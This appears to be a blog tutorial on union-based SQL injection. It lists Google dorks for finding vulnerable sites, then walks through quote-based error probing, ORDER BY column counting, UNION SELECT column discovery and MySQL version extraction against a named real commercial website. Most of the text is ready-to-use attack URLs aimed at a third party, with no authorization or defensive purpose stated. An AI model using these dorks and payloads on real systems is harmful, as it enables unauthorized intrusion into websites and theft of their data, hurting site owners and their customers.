Basic Union Based Injection
First off we need a vulnerable website. Google is the best partner for finding vulnerable sites. we use Google Dork for searching vulnerable websites. Google Dork is the trick to
find the perfect match. But we are going to use “inurl:” command for finding the
vulnerable websites.
[Example of Google Dork :]
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=sa
inurl:games.php?id=
inurl:page.php?file=
[How to use]
Copy one of the above command and paste it into the Google search engine box. Hit enter. You can get a list of websites. We have to visit the websites one by one for
checking the vulnerability.
Vulnerable Sites (With Syntax)
So after you got a vulnerable site, to test if you can inject, add a ' to the end of the
URL.
I'll be using this site
Code:
http://www.easystickersbanners.co.uk/banners.php?categoryid=15
As you can see, it loads perfectly fine, with no error. Now to see if it's vulnerable, add a ' (Single Quotes) to the end, so it should look like this.
Code:
http://www.easystickersbanners.co.uk/banners.php?categoryid=15’
Now you should get an error that looks like this.
Now that you found a vulnerable site, you need to find the number of columns. You can do this by using the "Order By" function. We'll start by guessing at
1,2,3,4,5,6.
So take your URL, and remove the ' from the end of it,
Your link should now look like this:
Code:
http://www.easystickersbanners.co.uk/banners.php?categoryid=15+order+by+1--
(no-error)
http://www.easystickersbanners.co.uk/banners.php?categoryid=15+order+by+2--
(no-error)
http://www.easystickersbanners.co.uk/banners.php?categoryid=15+order+by+3--
(no-error)
http://www.easystickersbanners.co.uk/banners.php?categoryid=15+order+by+4--
(no-error)
http://www.easystickersbanners.co.uk/banners.php?categoryid=15+order+by+5--
(no-error)
http://www.easystickersbanners.co.uk/banners.php?categoryid=15+order+by+6--
(error)
As you can see, it loads perfectly fine, so you're going to want to increase it until you get an error that says "Unknown column '(Column Count Here)' in 'order clause'".
It looks like this:
So my link looks like this now and loads perfectly fine.
Code:
http://www.easystickersbanners.co.uk/banners.php?categoryid=15+order+by+5--
Finding Vulnerable Columns
So now that you got the number of columns, you're going to want to see which ones you can get data from. You do this by using the "Union+Select" or "Union+All+Select" Function. First, you add a - in front of your ID Number.
It should look like this:
Code:
http://www.easystickersbanners.co.uk/banners.php?categoryid=-15
Or, instead, you can change the number to null, since that's what the - is doing.
Code:
http://www.easystickersbanners.co.uk/banners.php?categoryid=null
Then you want to use the Union Select function, so you add
+union+select+(Column Count Here)--
So for each column, you add it.
My link now looks like this:
Code:
www.easystickersbanners.co.uk/banners.php?categoryid=-
15+union+select+1,2,3,4,5--
Now the site looks like this, so we know that 1 are vulnerable columns.
Getting MySQL Version
First off, we want it to be 5 or more. If it was less than 5, you would use error-based injection (I won't cover that).
So pick one of your vulnerable columns, and replace it with either:
Code: @@version or version()
I'm going to use column 1, so now my link looks like this..
Code:
http://www.easystickersbanners.co.uk/banners.php?categoryid=null+union+Select+@@Version,2,3,4,5--
OR
http://www.easystickersbanners.co.uk/banners.php?categoryid=null+union+Select+version(),2,3,4,5--
No comments:
Post a Comment